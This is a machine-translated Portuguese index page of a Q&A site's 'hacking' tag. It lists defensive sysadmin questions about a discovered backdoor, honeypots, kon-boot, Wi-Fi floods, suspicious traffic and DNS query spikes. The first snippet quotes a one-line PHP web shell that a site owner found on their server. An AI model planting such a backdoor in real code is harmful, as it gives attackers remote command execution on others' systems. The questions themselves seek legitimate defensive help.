Perguntas sobre 'hacking'

Perguntas sobre defesa ou recuperação de hackers mal-intencionados. Não oferecemos suporte a hackers, portanto, perguntas sobre a realização desses hacks não são permitidas aqui.
1
resposta

Código backdoor do PHP [fechado]

Encontrei um backdoor no meu host. <? passthru(getenv(HTTP_ACCEPT_TROLOLO)); ?> Eu vejo solicitações no log de acesso a esse arquivo php que eram solicitações POST, mas não sei como o SETENV dessa variável foi definido; alguém poder...
22.07.2011 / 02:12
2
respostas

Política de Grupo ou regravar para ocultar os diálogos de inicialização no XP

Eu tenho um sistema que gostaria de tentar esconder alguns diálogos na inicialização. Eu me livrei do login e da tela de boas-vindas e de todos os tipos de coisas, mas ainda há alguns diálogos desagradáveis que não consigo esconder. Existe a cai...
08.10.2010 / 01:19
2
respostas

Como pode um invasor potencial de armadilha de sysadmin?

Depois dos honeypots, o Billy Goat, da IBM, trava seus codificadores maliciosos. Então, existe alguma outra abordagem para detectar e coletar possíveis ataques de pessoas mal-intencionadas? Qual é o seu plano de segurança contra algum tipo...
13.10.2009 / 02:33
3
respostas

Você já usou o kon-boot?

Alguém aqui já usou kon-boot ? Eu acho que pode funcionar por causa dos poucos posts do blog sobre isso, mas eu me sinto um pouco preocupado e estou interessado em ouvir experiências de qualquer um que tenha usado várias vezes sem efeitos colat...
25.06.2009 / 15:31
0
respostas

99% wa shell trava, carrega em 19 sistemas de arquivos raíos com falhas?

Eu suspeito que meu sistema de arquivos raiz tenha falhado. tail /var/log/syslog = > fechaduras dmesg não mostra nada interessante Eu acho que posso reiniciar e reconstruir o sistema, se necessário, como sua imagem, no entanto...
18.12.2017 / 06:06
1
resposta

Como encontrar a localização de inundações de pacotes de wi-fi

Vimos inundações contínuas de pacotes sem fio (beacon, solicitações de sondagem e inundações de resposta de sondagem) que são relatadas no log de eventos de nosso appliance de firewall de escritório. Estes estão sendo enviados continuamente e já...
25.09.2015 / 20:56
0
respostas

Meu site está sendo invadido (Bluehost)?

Estou executando um site simples fora do Bluehost, e eu precisava usar scripts Python personalizados, então criei uma pasta cgi-bin no diretório do meu site e adicionei meus arquivos python cgi lá. Toda vez que tentei usar uma solicitação AJAX p...
30.11.2014 / 23:51
0
respostas

conexão suspeita no servidor

SO: Windows Server 2003 Ferramenta de monitoramento: CurrPorts Ao monitorar o tráfego no servidor para o tráfego que sai na porta 80, exemplo de resultados: 5/1/2014 2:36:23 PM Adicionado cscript.exe TCP servidor-IP : 51560 207.34.231...
09.05.2014 / 15:39
0
respostas

Como proteger o diretório tmp de ataques de link físico quando o host não permite o particionamento

Sou um novo administrador de sistemas, descobri que preciso ter diretórios / tmp e / home em partições separadas para evitar possibilidades de escalonamento de privilégios por meio de ataque baseado em links físicos. Infelizmente meu host vps nã...
07.03.2014 / 06:55
0
respostas

Servidor obtendo constantes consultas TXT de DNS - Qual é o potencial de risco?

Recentemente, descobri que meu servidor estava gerando muito mais tráfego do que o normal. Normalmente, ganho em torno de 1 a 10 Mb por dia, já que o servidor só funciona como host de e-mails e sites estáticos. No entanto, nos últimos três...
01.04.2013 / 12:46